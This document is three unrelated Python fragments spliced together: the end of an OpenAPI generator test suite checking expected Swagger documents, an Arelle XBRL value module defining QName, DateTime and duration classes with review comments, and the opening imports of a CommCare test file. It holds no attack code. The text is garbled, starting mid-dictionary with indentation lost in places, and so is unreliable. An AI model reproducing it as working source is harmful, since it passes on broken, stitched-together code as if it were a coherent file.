'type': 'string',
},
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/entries/container/{entryId}/publish': {
'post': {
'operationId': 'MyService_entriesPublishContainer',
'parameters': [
{
'name': 'entryId',
'in': 'path',
'required': True,
'type': 'string',
},
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/entries/{entryId}/items': {
'post': {
'operationId': 'MyService_itemsPut',
'parameters': [
{
'name': 'entryId',
'in': 'path',
'required': True,
'type': 'string',
},
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/entries/{entryId}/publish': {
'post': {
'operationId': 'MyService_entriesPublish',
'parameters': [
{
'name': 'entryId',
'in': 'path',
'required': True,
'type': 'string',
},
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/nested': {
'post': {
'operationId': 'MyService_entriesNestedCollectionAction',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/process': {
'post': {
'operationId': 'MyService_entriesProcess',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/roundtrip': {
'post': {
'operationId': 'MyService_entriesRoundtrip',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
'schema': {
'$ref': self._def_path(all_fields)
},
},
},
},
},
},
'definitions': {
all_fields: {
'type': 'object',
'properties': {
'bool_value': {
'type': 'boolean',
},
'bytes_value': {
'type': 'string',
'format': 'byte',
},
'datetime_value': {
'type': 'string',
'format': 'date-time',
},
'double_value': {
'type': 'number',
'format': 'double',
},
'enum_value': {
'type': 'string',
'enum': [
'VAL1',
'VAL2',
],
},
'float_value': {
'type': 'number',
'format': 'float',
},
'int32_value': {
'type': 'integer',
'format': 'int32',
},
'int64_value': {
'type': 'string',
'format': 'int64',
},
'message_field_value': {
'$ref': self._def_path(nested),
'description':
'Message class to be used in a message field.',
},
'sint32_value': {
'type': 'integer',
'format': 'int32',
},
'sint64_value': {
'type': 'string',
'format': 'int64',
},
'string_value': {
'type': 'string',
},
'uint32_value': {
'type': 'integer',
'format': 'uint32',
},
'uint64_value': {
'type': 'string',
'format': 'uint64',
},
},
},
boolean_response: {
'type': 'object',
'properties': {
'result': {
'type': 'boolean',
},
},
'required': ['result'],
},
entry_publish_request: {
'type': 'object',
'properties': {
'entryId': {
'type': 'string',
},
'title': {
'type': 'string',
},
},
'required': [
'entryId',
'title',
]
},
publish_request_for_container: {
'type': 'object',
'properties': {
'title': {
'type': 'string',
},
},
'required': [
'title',
]
},
items_put_request: {
'type': 'object',
'properties': {
'body': {
'$ref': self._def_path(all_fields),
'description': 'Contains all field types.'
},
'entryId': {
'type': 'string',
},
},
'required': [
'entryId',
]
},
nested: {
'type': 'object',
'properties': {
'int_value': {
'type': 'string',
'format': 'int64',
},
'string_value': {
'type': 'string',
},
},
},
put_request: {
'type': 'object',
'properties': {
'body': {
'$ref': self._def_path(all_fields),
'description': 'Contains all field types.',
},
},
},
put_request_for_container: {
'type': 'object',
'properties': {
'body': {
'$ref': self._def_path(all_fields),
'description': 'Contains all field types.',
},
},
},
},
'securityDefinitions': {
'google_id_token': {
'authorizationUrl': '',
'flow': 'implicit',
'type': 'oauth2',
'x-issuer': 'accounts.google.com',
'x-jwks_uri': 'https://www.googleapis.com/oauth2/v1/certs',
},
},
}
test_util.AssertDictEqual(expected_openapi, api, self)
    def testLocalhost(self):
        """A localhost hostname must produce an http (not https) scheme in the OpenAPI doc."""
        @api_config.api(name='root', hostname='localhost:8080', version='v1')
        class MyService(remote.Service):
            """Describes MyService."""
            @api_config.method(message_types.VoidMessage, message_types.VoidMessage,
                               path='noop', http_method='GET', name='noop')
            def noop_get(self, unused_request):
                return message_types.VoidMessage()
        # Generate the OpenAPI (Swagger 2.0) document and compare it whole.
        api = json.loads(self.generator.pretty_print_config_to_json(MyService))
        expected_openapi = {
            'swagger': '2.0',
            'info': {
                'title': 'root',
                'description': 'Describes MyService.',
                'version': 'v1',
            },
            'host': 'localhost:8080',
            'consumes': ['application/json'],
            'produces': ['application/json'],
            'schemes': ['http'],  # localhost implies plain http
            'basePath': '/_ah/api',
            'paths': {
                '/root/v1/noop': {
                    'get': {
                        'operationId': 'MyService_noopGet',
                        'parameters': [],
                        'responses': {
                            '200': {
                                'description': 'A successful response',
                            },
                        },
                    },
                },
            },
            'securityDefinitions': {
                'google_id_token': {
                    'authorizationUrl': '',
                    'flow': 'implicit',
                    'type': 'oauth2',
                    'x-issuer': 'accounts.google.com',
                    'x-jwks_uri': 'https://www.googleapis.com/oauth2/v1/certs',
                },
            },
        }
        test_util.AssertDictEqual(expected_openapi, api, self)
    def testApiKeyRequired(self):
        """API-level api_key_required adds a security section per method; a method
        can opt out with api_key_required=False."""
        @api_config.api(name='root', hostname='example.appspot.com', version='v1',
                        api_key_required=True)
        class MyService(remote.Service):
            """Describes MyService."""
            @api_config.method(message_types.VoidMessage, message_types.VoidMessage,
                               path='noop', http_method='GET', name='noop')
            def noop_get(self, unused_request):
                return message_types.VoidMessage()
            # Overrides the API default: no key required for this method.
            @api_config.method(message_types.VoidMessage, message_types.VoidMessage,
                               path='override', http_method='GET', name='override',
                               api_key_required=False)
            def override_get(self, unused_request):
                return message_types.VoidMessage()
        api = json.loads(self.generator.pretty_print_config_to_json(MyService))
        expected_openapi = {
            'swagger': '2.0',
            'info': {
                'title': 'root',
                'description': 'Describes MyService.',
                'version': 'v1',
            },
            'host': 'example.appspot.com',
            'consumes': ['application/json'],
            'produces': ['application/json'],
            'schemes': ['https'],
            'basePath': '/_ah/api',
            'paths': {
                '/root/v1/noop': {
                    'get': {
                        'operationId': 'MyService_noopGet',
                        'parameters': [],
                        'responses': {
                            '200': {
                                'description': 'A successful response',
                            },
                        },
                        # Inherited from the api-level api_key_required=True.
                        'security': [
                            {
                                'api_key': [],
                            }
                        ],
                    },
                },
                '/root/v1/override': {
                    'get': {
                        'operationId': 'MyService_overrideGet',
                        'parameters': [],
                        'responses': {
                            '200': {
                                'description': 'A successful response',
                            },
                        },
                        # No 'security' key: method opted out of the API key.
                    },
                },
            },
            'securityDefinitions': {
                'google_id_token': {
                    'authorizationUrl': '',
                    'flow': 'implicit',
                    'type': 'oauth2',
                    'x-issuer': 'accounts.google.com',
                    'x-jwks_uri': 'https://www.googleapis.com/oauth2/v1/certs',
                },
                'api_key': {
                    'type': 'apiKey',
                    'name': 'key',
                    'in': 'query',
                },
            },
        }
        test_util.AssertDictEqual(expected_openapi, api, self)
    def testCustomUrl(self):
        """A custom base_path is emitted with its trailing slash stripped."""
        @api_config.api(name='root', hostname='example.appspot.com', version='v1',
                        base_path='/my/base/path/')
        class MyService(remote.Service):
            """Describes MyService."""
            @api_config.method(message_types.VoidMessage, message_types.VoidMessage,
                               path='noop', http_method='GET', name='noop')
            def noop_get(self, unused_request):
                return message_types.VoidMessage()
        api = json.loads(self.generator.pretty_print_config_to_json(MyService))
        expected_openapi = {
            'swagger': '2.0',
            'info': {
                'title': 'root',
                'description': 'Describes MyService.',
                'version': 'v1',
            },
            'host': 'example.appspot.com',
            'consumes': ['application/json'],
            'produces': ['application/json'],
            'schemes': ['https'],
            'basePath': '/my/base/path',  # note: no trailing slash
            'paths': {
                '/root/v1/noop': {
                    'get': {
                        'operationId': 'MyService_noopGet',
                        'parameters': [],
                        'responses': {
                            '200': {
                                'description': 'A successful response',
                            },
                        },
                    },
                },
            },
            'securityDefinitions': {
                'google_id_token': {
                    'authorizationUrl': '',
                    'flow': 'implicit',
                    'type': 'oauth2',
                    'x-issuer': 'accounts.google.com',
                    'x-jwks_uri': 'https://www.googleapis.com/oauth2/v1/certs',
                },
            },
        }
        test_util.AssertDictEqual(expected_openapi, api, self)
class DevServerOpenApiGeneratorTest(BaseOpenApiGeneratorTest,
                                    test_util.DevServerTest):
    """OpenAPI generation while running under the dev server: scheme is http."""

    def setUp(self):
        super(DevServerOpenApiGeneratorTest, self).setUp()
        # Switch the environment to look like the dev server; restore afterwards.
        self.env_key, self.orig_env_value = (test_util.DevServerTest.
                                             setUpDevServerEnv())
        self.addCleanup(test_util.DevServerTest.restoreEnv,
                        self.env_key, self.orig_env_value)

    def testDevServerOpenApi(self):
        """Even with a non-localhost hostname, the dev server forces http."""
        @api_config.api(name='root', hostname='example.appspot.com', version='v1')
        class MyService(remote.Service):
            """Describes MyService."""
            @api_config.method(message_types.VoidMessage, message_types.VoidMessage,
                               path='noop', http_method='GET', name='noop')
            def noop_get(self, unused_request):
                return message_types.VoidMessage()
        api = json.loads(self.generator.pretty_print_config_to_json(MyService))
        expected_openapi = {
            'swagger': '2.0',
            'info': {
                'title': 'root',
                'description': 'Describes MyService.',
                'version': 'v1',
            },
            'host': 'example.appspot.com',
            'consumes': ['application/json'],
            'produces': ['application/json'],
            'schemes': ['http'],  # dev server -> http despite appspot host
            'basePath': '/_ah/api',
            'paths': {
                '/root/v1/noop': {
                    'get': {
                        'operationId': 'MyService_noopGet',
                        'parameters': [],
                        'responses': {
                            '200': {
                                'description': 'A successful response',
                            },
                        },
                    },
                },
            },
            'securityDefinitions': {
                'google_id_token': {
                    'authorizationUrl': '',
                    'flow': 'implicit',
                    'type': 'oauth2',
                    'x-issuer': 'accounts.google.com',
                    'x-jwks_uri': 'https://www.googleapis.com/oauth2/v1/certs',
                },
            },
        }
        test_util.AssertDictEqual(expected_openapi, api, self)
# Run this test module directly with the stdlib unittest runner.
if __name__ == '__main__':
    unittest.main()
| |
u'''
Created on Jan 4, 2011
@author: Mark V Systems Limited
(c) Copyright 2011 Mark V Systems Limited, All rights reserved.
'''
from __future__ import division
import copy, datetime
try:
import regex as re
except ImportError:
import re
XmlUtil = None
def qname(value, name=None, noPrefixIsNoNamespace=False, castException=None, prefixException=None):
    """Build a QName from the several accepted input forms.

    Accepted combinations (see inline comments):
      * ``value`` is an etree ModelObject element: with no ``name`` the element's
        own tag becomes the QName; with ``name`` the element supplies the
        in-scope namespace map and ``name`` is the prefixed name.
      * ``value`` is a namespace URI and ``name`` is localname or prefix:localname.
      * ``value`` is 'prefix:localName' or '{namespaceURI}localName' clark notation.
    Returns None on unresolvable input, or raises castException/prefixException
    when those are provided.
    """
    # either value can be an etree ModelObject element: if no name then qname is element tag quanem
    #   if name provided qname uses element as xmlns reference and name as prefixed name
    # value can be namespaceURI and name is localname or prefix:localname
    # value can be prefix:localname (and localname omitted)
    # for xpath qnames which do not take default namespace if no prefix, specify noPrefixIsNoNamespace
    if isinstance(value, ModelObject):
        if name: # name is prefixed name
            element = value # may be an attribute
            value = name
            name = None
        else:
            return QName(value.prefix, value.namespaceURI, value.localName)
    elif isinstance(name, ModelObject):
        # NOTE(review): element is assigned and then immediately cleared, and
        # value becomes None, so this branch always falls into the
        # not-a-string cast failure below -- looks dead/broken; confirm with
        # callers before changing.
        element = name
        name = None
        element = None
        value = name
    else:
        element = None
    if isinstance(value,QName):
        return value
    elif not isinstance(value,_STR_BASE):
        if castException: raise castException
        return None
    if value and value[0] == u'{': # clark notation (with optional prefix)
        namespaceURI,sep,prefixedLocalName = value[1:].rpartition(u'}')
        prefix,sep,localName = prefixedLocalName.rpartition(u':')
        if not sep:
            prefix = None
        namespaceDict = None
    else:
        if isinstance(name, dict):
            namespaceURI = None
            namespaceDict = name # note that default prefix must be None, not '', in dict
        elif name is not None:
            if name:  # len > 0: value is the namespace URI, name the (prefixed) local name
                namespaceURI = value
            else:
                namespaceURI = None
            namespaceDict = None
            value = name
        else:
            namespaceURI = None
            namespaceDict = None
        prefix,sep,localName = value.strip().rpartition(u":") # must be whitespace collapsed
        if not prefix:
            prefix = None # don't want '' but instead None if no prefix
            if noPrefixIsNoNamespace:
                return QName(None, None, localName)
    if namespaceURI:
        return QName(prefix, namespaceURI, localName)
    elif namespaceDict and prefix in namespaceDict:
        return QName(prefix, namespaceDict[prefix], localName)
    elif element is not None:
        # same as XmlUtil.xmlns but local for efficiency
        namespaceURI = element.nsmap.get(prefix)
        if not namespaceURI and prefix == u'xml':
            namespaceURI = u"http://www.w3.org/XML/1998/namespace"
    if not namespaceURI:
        if prefix:
            if prefixException: raise prefixException
            return None # error, prefix not found
        namespaceURI = None # cancel namespace if it is a zero length string
    return QName(prefix, namespaceURI, localName)
def qnameNsLocalName(namespaceURI, localName):
    """Build a QName from a namespace URI and a plain local name.

    Does not handle local names that carry a prefix; an empty namespace
    string is normalized to None.
    """
    return QName(None, namespaceURI if namespaceURI else None, localName)
def qnameClarkName(clarkname):
    """Parse '{namespaceURI}localName' clark notation into a QName.

    A value not in clark notation is treated as a bare local name with no
    namespace.  Prefixes inside the local part are not handled.
    """
    if not clarkname or clarkname[0] != u'{':
        return QName(None, None, clarkname)
    namespaceURI, _sep, localName = clarkname[1:].rpartition(u'}')
    return QName(None, namespaceURI or None, localName)
def qnameEltPfxName(element, prefixedName, prefixException=None):
    """Resolve 'prefix:localName' against an element's in-scope namespace map.

    Returns a QName, or None (or raises prefixException, when given) if the
    prefix cannot be resolved.  The built-in 'xml' prefix is always known.
    """
    prefix, _sep, localName = prefixedName.rpartition(u':')
    if not prefix:
        prefix = None  # normalize '' to None for the no-prefix case
    namespaceURI = element.nsmap.get(prefix)
    if namespaceURI:
        return QName(prefix, namespaceURI, localName)
    if prefix is None:
        # no prefix and no default namespace: cancel the namespace entirely
        return QName(None, None, localName)
    if prefix == u'xml':
        return QName(prefix, u"http://www.w3.org/XML/1998/namespace", localName)
    if prefixException:
        raise prefixException
    return None
class QName(object):
    """A qualified XML name: (prefix, namespaceURI, localName).

    Equality and hashing consider only namespaceURI and localName -- the
    prefix is retained for display/serialization but two QNames with the
    same namespace and local name are equal regardless of prefix.

    Changes from the previous version: two large blocks of dead,
    commented-out comparison code were removed, and the ordering operators
    now return real booleans (the short-circuit or-chains previously could
    return a namespaceURI string as a truthy stand-in for True).
    """
    __slots__ = (u"prefix", u"namespaceURI", u"localName", u"qnameValueHash")

    def __init__(self, prefix, namespaceURI, localName):
        self.prefix = prefix
        self.namespaceURI = namespaceURI
        self.localName = localName
        # Precomputed; prefix deliberately excluded so p1:n == p2:n when the URIs match.
        self.qnameValueHash = hash((namespaceURI, localName))

    def __hash__(self):
        return self.qnameValueHash

    @property
    def clarkNotation(self):
        """Return '{namespaceURI}localName', or just localName when there is no namespace."""
        if self.namespaceURI:
            return u'{{{0}}}{1}'.format(self.namespaceURI, self.localName)
        return self.localName

    def __repr__(self):
        return self.__str__()

    def __str__(self):
        if self.prefix and self.prefix != u'':
            return self.prefix + u':' + self.localName
        return self.localName

    def __eq__(self, other):
        try:
            return (self.qnameValueHash == other.qnameValueHash and
                    self.localName == other.localName and self.namespaceURI == other.namespaceURI)
        except AttributeError:  # other is not QName-like
            return False

    def __ne__(self, other):
        return not self.__eq__(other)

    # Ordering: no-namespace sorts before any namespace, then by namespaceURI,
    # then by localName.
    def __lt__(self, other):
        return bool((self.namespaceURI is None and other.namespaceURI) or
                    (self.namespaceURI and other.namespaceURI and self.namespaceURI < other.namespaceURI) or
                    (self.namespaceURI == other.namespaceURI and self.localName < other.localName))

    def __le__(self, other):
        return bool((self.namespaceURI is None and other.namespaceURI) or
                    (self.namespaceURI and other.namespaceURI and self.namespaceURI < other.namespaceURI) or
                    (self.namespaceURI == other.namespaceURI and self.localName <= other.localName))

    def __gt__(self, other):
        return bool((self.namespaceURI and other.namespaceURI is None) or
                    (self.namespaceURI and other.namespaceURI and self.namespaceURI > other.namespaceURI) or
                    (self.namespaceURI == other.namespaceURI and self.localName > other.localName))

    def __ge__(self, other):
        return bool((self.namespaceURI and other.namespaceURI is None) or
                    (self.namespaceURI and other.namespaceURI and self.namespaceURI > other.namespaceURI) or
                    (self.namespaceURI == other.namespaceURI and self.localName >= other.localName))
from arelle.ModelObject import ModelObject
def anyURI(value):
    """Wrap *value* as an AnyURI string instance (no validation performed)."""
    return AnyURI(value)
class AnyURI(unicode):
    """String subclass tagging a value as an xs:anyURI (py2 unicode base)."""
    def __new__(cls, value):
        return unicode.__new__(cls, value)
# Lexical patterns for XML Schema date/time/duration values (py2 ur'' literals).
# datetimePattern: first alternative (groups 1-6) is a dateTime, second
# alternative (groups 7-9) is a date-only value.
datetimePattern = re.compile(ur"\s*([0-9]{4})-([0-9]{2})-([0-9]{2})[T ]([0-9]{2}):([0-9]{2}):([0-9]{2})\s*|"
                             ur"\s*([0-9]{4})-([0-9]{2})-([0-9]{2})\s*")
timePattern = re.compile(ur"\s*([0-9]{2}):([0-9]{2}):([0-9]{2})\s*")
# Each duration component may carry its own sign, plus a leading overall sign.
durationPattern = re.compile(ur"\s*(-?)P((-?[0-9]+)Y)?((-?[0-9]+)M)?((-?[0-9]+)D)?(T((-?[0-9]+)H)?((-?[0-9]+)M)?((-?[0-9.]+)S)?)?\s*")
# 'type' argument values accepted by dateTime():
DATE = 1       # xs:date (date-only)
DATETIME = 2   # xs:dateTime
DATEUNION = 3  # union: accept either lexical form
def dateTime(value, time=None, addOneDay=None, type=None, castException=None):
    """Coerce *value* to a DateTime.

    Accepts the sentinels u"MinDate"/u"maxyear", a ModelObject (its text is
    parsed), existing DateTime/datetime/date instances, or a lexical
    xs:date / xs:dateTime string.  ``type`` is one of DATE, DATETIME,
    DATEUNION (or None); ``addOneDay`` shifts a date-only value to the
    following midnight (period-end convention).  Returns None on parse
    failure unless castException is provided, in which case it is raised.
    """
    if value == u"MinDate":
        return DateTime(datetime.MINYEAR,1,1)
    elif value == u"maxyear":
        # NOTE(review): sentinel casing is inconsistent with u"MinDate" -- confirm callers.
        return DateTime(datetime.MAXYEAR,12,31)
    elif isinstance(value, ModelObject):
        value = value.text
    elif isinstance(value, DateTime) and not addOneDay and (value.dateOnly == (type == DATE)):
        return value # no change needed for cast or conversion
    elif isinstance(value, datetime.datetime):
        if type == DATE:
            dateOnly = True
        elif type == DATETIME:
            dateOnly = False
        else:
            dateOnly = isinstance(value, DateTime) and value.dateOnly
        if addOneDay and not dateOnly:
            addOneDay = False  # day shift only applies to date-only values
        return DateTime(value.year, value.month, value.day, value.hour, value.minute, value.second, value.microsecond, tzinfo=value.tzinfo, dateOnly=dateOnly, addOneDay=addOneDay)
    elif isinstance(value, datetime.date):
        return DateTime(value.year, value.month, value.day,dateOnly=True,addOneDay=addOneDay)
    elif castException and not isinstance(value, _STR_BASE):
        raise castException(u"not a string value")
    if value is None:
        return None
    match = datetimePattern.match(value.strip())
    if match is None:
        if castException:
            raise castException(u"lexical pattern mismatch")
        return None
    if match.lastindex == 6:
        # groups 1-6 matched: full dateTime lexical form
        if type == DATE:
            if castException:
                raise castException(u"date-only object has too many fields or contains time")
            return None
        result = DateTime(int(match.group(1)),int(match.group(2)),int(match.group(3)),int(match.group(4)),int(match.group(5)),int(match.group(6)), dateOnly=False)
    else:
        # groups 7-9 matched: date-only lexical form
        if type == DATE or type == DATEUNION:
            dateOnly = True
        elif type == DATETIME:
            dateOnly = False
        else:
            dateOnly = False
        result = DateTime(int(match.group(7)),int(match.group(8)),int(match.group(9)),dateOnly=dateOnly,addOneDay=addOneDay)
    return result
def lastDayOfMonth(year, month):
    """Return the number of days in *month* of *year* (Gregorian leap rules)."""
    if month in (1,3,5,7,8,10,12): return 31
    if month in (4,6,9,11): return 30
    # February: leap year if divisible by 400, or by 4 but not by 100.
    if year % 400 == 0 or (year % 100 != 0 and year % 4 == 0): return 29
    return 28

#!!! see note in XmlUtil.py datetimeValue, may need exceptions handled or special treatment for end time of 9999-12-31
class DateTime(datetime.datetime):
    """datetime.datetime subclass carrying a ``dateOnly`` flag plus XBRL adjustments.

    ``dateOnly`` marks values parsed from xs:date; ``addOneDay`` shifts a value
    to the following midnight (period-end convention).  Hour 24 is accepted and
    normalized to 00:00 of the next day, per XML Schema.

    Bug fix: addYearMonthDuration previously computed ``m %= 12`` on a 1-based
    month, so any result landing on December produced month 0 and raised
    ValueError; month arithmetic is now done on a 0-based index.
    """
    def __new__(cls, y, m, d, hr=0, min=0, sec=0, microsec=0, tzinfo=None, dateOnly=None, addOneDay=None):
        lastDay = lastDayOfMonth(y, m)
        # check day and month before adjustment
        if not 1 <= m <= 12: raise ValueError(u"month must be in 1..12")
        if not 1 <= d <= lastDay: raise ValueError(u"day is out of range for month")
        if hr == 24:
            if min != 0 or sec != 0 or microsec != 0: raise ValueError(u"hour 24 must have 0 mins and secs.")
            hr = 0  # 24:00:00 normalizes to 00:00:00 of the next day
            d += 1
        if addOneDay:
            d += 1
        # roll over any day/month overflow produced by the adjustments above
        if d > lastDay: d -= lastDay; m += 1
        if m > 12: m = 1; y += 1
        dateTime = datetime.datetime.__new__(cls, y, m, d, hr, min, sec, microsec, tzinfo)
        dateTime.dateOnly = dateOnly
        return dateTime
    def __copy__(self):
        # addOneDay is not propagated: any day shift was already applied at construction
        return DateTime(self.year, self.month, self.day, self.hour, self.minute, self.second, self.microsecond, self.tzinfo, self.dateOnly)
    def __str__(self):
        if self.dateOnly:
            return u"{0.year:04}-{0.month:02}-{0.day:02}".format(self)
        else:
            return u"{0.year:04}-{0.month:02}-{0.day:02}T{0.hour:02}:{0.minute:02}:{0.second:02}".format(self)
    def addYearMonthDuration(self, other, sign):
        """Add (sign=1) or subtract (sign=-1) a YearMonthDuration.

        The day is clamped to the last day of the resulting month.
        """
        # 0-based month index so year carry and month wraparound are correct
        monthIndex = self.month - 1 + sign * other.months
        y = self.year + sign * other.years + monthIndex // 12
        m = monthIndex % 12 + 1
        d = self.day
        lastDay = lastDayOfMonth(y, m)
        if d > lastDay: d = lastDay
        return DateTime(y, m, d, self.hour, self.minute, self.second, self.microsecond, self.tzinfo, self.dateOnly)
    def __add__(self, other):
        if isinstance(other, YearMonthDuration):
            return self.addYearMonthDuration(other, 1)
        else:
            if isinstance(other, Time): other = dayTimeDuration(other)
            dt = super(DateTime, self).__add__(other)
            return DateTime(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, dt.tzinfo, self.dateOnly)
    def __sub__(self, other):
        if isinstance(other, YearMonthDuration):
            return self.addYearMonthDuration(other, -1)
        else:
            dt = super(DateTime, self).__sub__(other)
            if isinstance(dt,datetime.timedelta):
                # datetime - datetime: wrap the difference as a duration
                return DayTimeDuration(dt.days, 0, 0, dt.seconds)
            else:
                if isinstance(other, Time): other = dayTimeDuration(other)
                return DateTime(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, dt.tzinfo, self.dateOnly)
def dateUnionEqual(dateUnion1, dateUnion2, instantEndDate=False):
    """True when two date-or-dateTime union values denote the same moment.

    With instantEndDate, date-only values are shifted forward one day to the
    instant-end-of-day convention before comparing.
    """
    def coerce(d):
        # Order matters: DateTime subclasses datetime.date, so test it first.
        if isinstance(d, DateTime):
            if instantEndDate and d.dateOnly:
                d += datetime.timedelta(1)
        elif isinstance(d, datetime.date):
            d = dateTime(d, addOneDay=instantEndDate)
        return d
    return coerce(dateUnion1) == coerce(dateUnion2)
def dateunionDate(datetimeValue, subtractOneDay=False):
    """Convert a date-or-dateTime union value to a plain datetime.date.

    A value is considered date-only when it carries a truthy ``dateOnly``
    attribute or has no ``hour`` attribute at all.  With subtractOneDay, a
    midnight dateTime is moved back one day (undoing the end-of-day shift);
    date-only values are returned unchanged.
    """
    value = datetimeValue
    isDateOnly = getattr(value, u'dateOnly', False) or not hasattr(value, u'hour')
    atMidnight = isDateOnly or (value.hour, value.minute, value.second) == (0, 0, 0)
    if atMidnight and subtractOneDay and not isDateOnly:
        value -= datetime.timedelta(1)
    return datetime.date(value.year, value.month, value.day)
def yearMonthDuration(value):
    """Parse an xs:yearMonthDuration lexical string into a YearMonthDuration.

    Raises ValueError when the string carries day or time components.
    """
    groups = durationPattern.match(value).groups()
    minus, hasYr, yrs, hasMo, mos, hasDay, days, hasTime, hasHr, hrs, hasMin, mins, hasSec, secs = groups
    if hasDay or hasHr or hasMin or hasSec:
        raise ValueError  # day/time parts are not allowed in a yearMonthDuration
    sign = -1 if minus else 1
    return YearMonthDuration(sign * int(yrs or 0), sign * int(mos or 0))
class YearMonthDuration():
    """An xs:yearMonthDuration value as a signed count of years and months."""

    def __init__(self, years, months):
        self.years, self.months = years, months

    def __repr__(self):
        # Lexical form, e.g. P2Y5M
        return u"P{0}Y{1}M".format(self.years, self.months)
def dayTimeDuration(value):
    """Parse an xs:dayTimeDuration string (or convert a Time) into a DayTimeDuration.

    Raises ValueError when the string carries year or month components.
    NOTE(review): seconds are converted with int(), so a fractional seconds
    field (allowed by durationPattern) would raise ValueError -- confirm intent.
    """
    if isinstance(value, Time):
        # hour24 flags a 24:00:00 time, which is one full day
        return DayTimeDuration(1 if value.hour24 else 0, value.hour, value.minute, value.second)
    groups = durationPattern.match(value).groups()
    minus, hasYr, yrs, hasMo, mos, hasDay, days, hasTime, hasHr, hrs, hasMin, mins, hasSec, secs = groups
    if hasYr or hasMo:
        raise ValueError  # year/month parts are not allowed in a dayTimeDuration
    sign = -1 if minus else 1
    return DayTimeDuration(sign * int(days or 0),
                           sign * int(hrs or 0),
                           sign * int(mins or 0),
                           sign * int(secs or 0))
class DayTimeDuration(datetime.timedelta):
    """An xs:dayTimeDuration value, as a datetime.timedelta subclass.

    Bug fixes relative to the prior version:
      * datetime.timedelta's positional parameters are (days, seconds,
        microseconds, milliseconds, minutes, hours, weeks), so the old
        positional call silently mapped hours->seconds, minutes->microseconds
        and seconds->milliseconds; keyword arguments are now used.
      * __repr__ referenced the bound method ``self.dayHrsMinsSecs`` without
        calling it, so subscripting raised TypeError.
      * dayHrsMinsSecs could leave ``microseconds`` unbound (NameError) for
        negative durations, derived hours by dividing by 86400 instead of
        3600, and used true division for the day carry (float days).
    """
    def __new__(cls, days, hours, minutes, seconds):
        # Keywords are essential: timedelta's positional order is NOT
        # (days, hours, minutes, seconds).
        return datetime.timedelta.__new__(cls, days=days, hours=hours,
                                          minutes=minutes, seconds=seconds)

    def dayHrsMinsSecs(self):
        """Return (days, hours, minutes, seconds), rounding microseconds half-up.

        For negative durations each nonzero leading component carries the sign,
        matching the per-component signs durationPattern accepts.
        """
        totalSeconds = self.days * 86400 + self.seconds
        if self.microseconds >= 500000:  # round up to the next whole second
            totalSeconds += 1
        sign = -1 if totalSeconds < 0 else 1
        remainder = abs(totalSeconds)
        days, remainder = divmod(remainder, 86400)
        hours, remainder = divmod(remainder, 3600)
        minutes, seconds = divmod(remainder, 60)
        return (sign * days, sign * hours, sign * minutes, sign * seconds)

    def __repr__(self):
        x = self.dayHrsMinsSecs()  # previously missing the call parentheses
        return u"P{0}DT{1}H{2}M{3}S".format(x[0], x[1], x[2], x[3])
def time(value, castException=None):
    """Coerce *value* to a Time.

    Accepts the sentinels u"MinTime"/u"MaxTime", a ModelObject (its text is
    parsed), datetime.time/datetime.datetime instances, or a lexical HH:MM:SS
    string.  Returns None on parse failure (castException, when given, is
    raised for non-string input).

    Bug fix: the previous code evaluated ``time.min`` / ``time.max``, but
    ``time`` here is this very function (it shadows the stdlib module), so
    those branches raised AttributeError -- and even with the right object,
    Time(time.min) passed a time instance as the hour.  datetime.time.min/.max
    are now used and unpacked into Time's components.
    """
    if value == u"MinTime":
        t = datetime.time.min   # 00:00:00
        return Time(t.hour, t.minute, t.second, t.microsecond)
    elif value == u"MaxTime":
        t = datetime.time.max   # 23:59:59.999999
        return Time(t.hour, t.minute, t.second, t.microsecond)
    elif isinstance(value, ModelObject):
        value = value.text
    elif isinstance(value, datetime.time):
        return Time(value.hour, value.minute, value.second, value.microsecond, value.tzinfo)
    elif isinstance(value, datetime.datetime):
        return Time(value.hour, value.minute, value.second, value.microsecond, value.tzinfo)
    elif castException and not isinstance(value, _STR_BASE):
        raise castException
    if value is None:
        return None
    match = timePattern.match(value.strip())
    if match is None:
        return None
    return Time(int(match.group(1)), int(match.group(2)), int(match.group(3)))
class Time(datetime.time):
    """datetime.time subclass accepting hour 24 (XML Schema end-of-day).

    24:00:00 is stored as 00:00:00 with the ``hour24`` flag set so callers
    can distinguish it from a genuine midnight.
    """
    def __new__(cls, hour=0, minute=0, second=0, microsecond=0, tzinfo=None):
        is24 = hour == 24 and (minute, second, microsecond) == (0, 0, 0)
        if is24:
            hour = 0
        instance = datetime.time.__new__(cls, hour, minute, second, microsecond, tzinfo)
        instance.hour24 = is24
        return instance
class gYearMonth():
    """An xs:gYearMonth value (year + month, both coerced to int)."""

    def __init__(self, year, month):
        self.year = int(year)
        self.month = int(month)

    def __repr__(self):
        return u"-{0}-{1}".format(self.year, self.month)
class gMonthDay():
    """An xs:gMonthDay value (month + day, both coerced to int)."""

    def __init__(self, month, day):
        self.month = int(month)
        self.day = int(day)

    def __repr__(self):
        return u"--{0}-{1}".format(self.month, self.day)
class gYear():
    """An xs:gYear value (a year, coerced to int)."""

    def __init__(self, year):
        self.year = int(year)

    def __repr__(self):
        return u"{0}".format(self.year)
class gMonth():
    """An xs:gMonth value (a month number, coerced to int)."""

    def __init__(self, month):
        self.month = int(month)

    def __repr__(self):
        return u"--{0}".format(self.month)
class gDay():
    """An xs:gDay value (a day-of-month number, coerced to int)."""

    def __init__(self, day):
        self.day = int(day)

    def __repr__(self):
        return u"---{0}".format(self.day)
class InvalidValue(unicode):
    """String subclass marking a value that failed validation/transformation (py2 unicode base)."""
    def __new__(cls, value):
        return unicode.__new__(cls, value)
# Shared sentinel for inline-XBRL transform failures.
INVALIDixVALUE = InvalidValue(u"(ixTransformValueError)")
| |
from contextlib import contextmanager
from casexml.apps.case.mock import CaseFactory
from casexml.apps.case.models import CommCareCase
from casexml.apps.case.signals import case_post_save
from corehq.apps.data_interfaces.models import (AutomaticUpdateRule,
AutomaticUpdateRuleCriteria,
AutomaticUpdateAction, AUTO_UPDATE_XMLNS)
